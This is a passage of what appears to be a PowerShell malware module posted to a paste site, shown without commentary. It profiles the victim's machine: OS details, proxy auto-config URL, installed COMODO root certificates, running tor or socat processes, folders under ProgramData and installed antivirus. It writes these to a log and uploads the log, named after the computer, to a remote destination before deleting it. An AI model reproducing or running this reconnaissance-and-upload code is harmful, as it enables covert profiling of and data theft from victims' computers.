- $wc.UploadFile("$dest/$(gc env:computername).log", $Logfile);
- Remove-Item -Path $Logfile;
- }
- function CheckInstall(){
- $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
- $wininfo.MUILanguages=$wininfo.MUILanguages -join ",";
- LogWrite("OS info: {0}" -f $wininfo -join "");
- if (test-path variable:psversiontable) {
- $version = $psversiontable.psversion;
- } else {
- $version = [version]"1.0.0.0";
- }
- LogWrite("Powershell version: {0}" -f $version);
- try {
- $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;
- LogWrite("Pac setted: '$pac'");
- }
- catch {
- LogWrite("ERROR: Pac not setted");
- }
- $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)});
- if (-NOT $Certs.count -eq 0){
- LogWrite("Certs installed: '{0}'" -f ($Certs -join "; "));
- }else {
- LogWrite("Certs not found");
- }
- try{
- $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;
- LogWrite("Proccess list:`n{0}" -f ($proc -join "`n"));
- }
- catch {
- LogWrite("ERROR: Can't get proccess list");
- }
- $DestTP=$env:ALLUSERSPROFILE;
- try{
- $dirs=dir($DestTP) -ErrorAction Stop;
- LogWrite("List dir [{0}]: {1}" -f ($DestTP, (($dirs|Select -expand Name) -join "; ")));
- foreach($dir in $dirs){
- try{
- $subdir=dir($dir.FullName) -ErrorAction Stop;
- LogWrite("List dir [{0}]:{1}" -f ($dir.FullName, (($subdir|Select -expand Name) -join "; ")));
- }
- catch{
- LogWrite("ERROR: Can't list dir {0}" -f $dir.FullName);
- }
- }
- }
- catch {
- LogWrite("ERROR: Can't list dir {0}" -f $DestTP);
- }
- $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName);
- if (-NOT $avlist.count -eq 0){
- LogWrite("Av installed: '{0}'" -f ($avlist -join "; "));
- }else {
- LogWrite("Av not found");
- }
- }
- function StartWork(){
- LogWrite "Start Log module";
- Start-Sleep -s 3;
- CheckInstall;
- UploadLog;
- }
- StartWork;
Add Comment
Please, Sign In to add comment